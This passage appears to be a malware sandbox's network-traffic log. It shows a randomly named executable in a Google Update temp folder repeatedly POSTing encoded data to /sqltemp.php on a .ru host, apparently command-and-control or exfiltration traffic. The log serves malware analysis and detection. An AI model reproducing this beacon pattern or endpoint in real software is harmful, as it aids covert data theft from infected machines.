                                                                                                                  Jan 1, 2025 16:02:41.429148912 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:41.596493959 CET802INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6LFymUaa%2BZDv%2FFvq8cYCutN4CUOWFJDgu0cFS3zYpv3s4ucLD26OLJyDVga6bmUTQ0CPy35hR7croIJa7JCueo0RXPnMtlqhUJbnBvo3Fl4T0Gn1YbrDzRRosHhAiENssNyW0lI8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3644cad8042d0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4207&min_rtt=1733&rtt_var=5599&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=67809&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  37192.168.2.662595104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:41.723901987 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:42.078960896 CET1124OUTData Raw: 56 50 5a 51 51 5b 51 51 58 56 52 59 56 51 59 52 5b 5a 54 5e 55 5a 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VPZQQ[QQXVRYVQYR[ZT^UZPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y&/X7<&'X8,)>#[$X+*#>;7T0<;>&?.:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:42.169867039 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:42.434268951 CET800INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OOhsD2jAaorM8kDEXnOUhnIEWqEEKoXrjbFqikENBRn1s1oOUyYfDqfijuTFQcg9JK9oxM4irlEvlNqgpVIhdzE25nfcEzW4ZoOw1YBeGBTf6os%2FjUsnoCZGiqUZMHBjY4nEQatS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3645149961865-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1514&rtt_var=769&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=629581&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  38192.168.2.662601104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:42.575678110 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:42.923135996 CET1124OUTData Raw: 53 50 5a 53 54 5e 51 55 58 56 52 59 56 58 59 5e 5b 59 54 51 55 5f 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZST^QUXVRYVXY^[YTQU_P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._'&7!Y'.'A82!.,X?$(>+ "<%#S.*&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:02:43.022933960 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:43.192013979 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCIMRvirtoRT0rPXF90OoytEvUqe7SyF1QH9SNg3qHy9O8cf4q5OvpOYyIH7oFb%2Bz6Wcfmh03vx%2BBOWMGtZoP%2BCaz4vI2FdNkUxc43htb2QFNxukalnne%2BrQjwNT2E4%2BvjL5kVni"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364569f5b7ce8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8321&min_rtt=2005&rtt_var=13384&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=27790&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  39192.168.2.662607104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:43.326776028 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:43.672934055 CET1124OUTData Raw: 53 55 5a 57 54 5d 51 55 58 56 52 59 56 5b 59 56 5b 5b 54 5e 55 5c 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SUZWT]QUXVRYV[YV[[T^U\PUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$."/%'-(;14=3(;V=.!2 ?5B14-&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:02:43.790270090 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:44.058361053 CET801INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zMA7eegZzF4u6wmb%2FQiPOB2ShYcISg3ByMF1qsbFcFBH1mf1SKC7q%2BlCXg0vprObMtGrBve9UeZvqJfkgeXaImNlVJ1SOckzHEoPrGJqxR2BCQ1nPFbyvjgU7JQf27T2aZd6gSef"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3645b6d4243b1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4630&min_rtt=2187&rtt_var=5707&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=67172&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  40192.168.2.662613104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:44.192681074 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:44.547753096 CET1124OUTData Raw: 53 50 5f 5c 54 5e 54 52 58 56 52 59 56 58 59 50 5b 59 54 5b 55 54 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_\T^TRXVRYVXYP[YT[UTP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$/] 20'E.* #+(>>8X7(?9%?4::&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:02:44.646042109 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:44.903242111 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sj2w7iZEcQ5WWg8j0LxsYyoNZsV%2Fj%2FTNMWXpYHSS%2BCXxyaxMfDmB3Zc%2FxF6g5UpvkEEzkDBNLk7j4g5bcnVweD9iE9pIrKXNzJHdY1TSFKp6%2FFjYxQSx8lEt%2F61ItAZ2DlXSyFyi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36460b98b7d00-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8550&min_rtt=1977&rtt_var=13888&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=26758&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  41192.168.2.662619104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:44.964205980 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:45.324645996 CET1964OUTData Raw: 53 55 5f 56 51 58 54 50 58 56 52 59 56 5a 59 56 5b 5c 54 5f 55 54 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_VQXTPXVRYVZYV[\T_UTP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.'<)Z"/)_37A;*& [/?)+W*4]#"\((51,?-&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:45.427402020 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:45.699793100 CET960INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZPOxsR9%2FF9yiPQ8u1ZX4ToKzdpTqlJdwvr0F%2FuI9pp5qOjYrzeAx3D318vIl9N6C4yfuf6khHACSxOc%2FachYyGirWoNhjSzYOmu7fuz%2F1%2B0YVF5o4hT5rv7AZn%2BXaADZPJ20Atf0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364659cecc3f5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2713&min_rtt=1539&rtt_var=2926&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=133528&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 55 3d 3d 2e 1c 26 54 33 04 3c 3d 06 0b 26 3d 35 01 3c 3b 26 15 27 3e 38 03 3d 29 24 02 21 2c 21 58 26 5e 3b 07 20 03 37 5b 27 34 2b 59 05 1c 20 42 36 2f 02 1c 3d 2d 09 5d 32 3f 03 5d 33 2e 38 5d 28 38 34 57 22 2b 01 1d 30 13 38 1e 3e 04 06 1f 27 3c 33 5b 39 3f 29 54 30 3a 2c 54 00 11 25 0f 24 0f 3b 06 20 24 24 12 35 31 3d 10 32 27 36 56 26 2f 3c 0b 37 3a 39 00 31 31 3f 13 22 20 3d 00 31 15 25 11 21 3e 23 18 29 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%U==.&T3<=&=5<;&'>8=)$!,!X&^; 7['4+Y B6/=-]2?]3.8](84W"+08>'<3[9?)T0:,T%$; $$51=2'6V&/<7:911?" =1%!>#)%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  42192.168.2.662620104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:45.036222935 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:45.391571045 CET1124OUTData Raw: 53 55 5f 5d 54 5c 54 55 58 56 52 59 56 50 59 50 5b 5d 54 51 55 5f 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_]T\TUXVRYVPYP[]TQU_P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3?% :'.(,=T4>3<90=>+!2<(861/#U.&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:45.490514994 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:45.778443098 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bue5ZeOFwMIieGE17Ebw0lUMq0u%2BpC75yOQp9GKCKi1OcAh6Tmp9bTIQW%2FzwVO3V27MUOHWfSgNuvWyLWDm5ECDHdSS10DD%2Bf9MEaYvDxunNKoM8DcEyz0MmCfA5iVgLM1tR5M%2Bi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364660cd242b3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4502&min_rtt=1879&rtt_var=5951&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=63855&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  43192.168.2.662626104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:45.913611889 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:46.266894102 CET1124OUTData Raw: 53 55 5f 51 54 51 51 52 58 56 52 59 56 5e 59 55 5b 52 54 50 55 5a 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_QTQQRXVRYV^YU[RTPUZP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y&,=]"?!^%>;>7<7)- Z4! (+=C&,$::&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:46.357459068 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:46.621115923 CET801INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnbsrAdTorrck3nUDo6IEVckf4OQnTnCA03prLBks4YQMNcceIiRH8uS%2FjWC70jKLTFwuLEjLDV6RMSGKB6nRF47pwkcUGtqky1hw1CC01wT0mesORzFXbZFp7gxrxz85lnbQoSr"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3646b7c73efa5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=1885&rtt_var=1001&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=476656&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  44192.168.2.662632104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:46.755052090 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:47.110240936 CET1124OUTData Raw: 53 55 5a 50 51 5f 54 51 58 56 52 59 56 50 59 56 5b 58 54 5f 55 5d 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SUZPQ_TQXVRYVPYV[XT_U]PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$/6 ?X%-?D,*S!.<Y?$*. "4(*&/;S-*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:47.228429079 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:47.493441105 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BW%2BwpNraj17wdUmnh4K6J7uy4W5dMMWAwfP2CrpTzIoIAAph8ptlzoDs2rlKLAWeRecql%2F4sM2SSiUqSepT5X8%2FgLQtuxP7yNKtpUq0hhY512n5%2BOeobGO90vqeMfoyQpbigVxpE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36470defd42fd-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4299&min_rtt=1686&rtt_var=5859&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=64621&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  45192.168.2.662643104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:47.612899065 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:47.969753027 CET1124OUTData Raw: 56 57 5a 51 51 5f 51 56 58 56 52 59 56 5c 59 56 5b 59 54 5e 55 5a 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
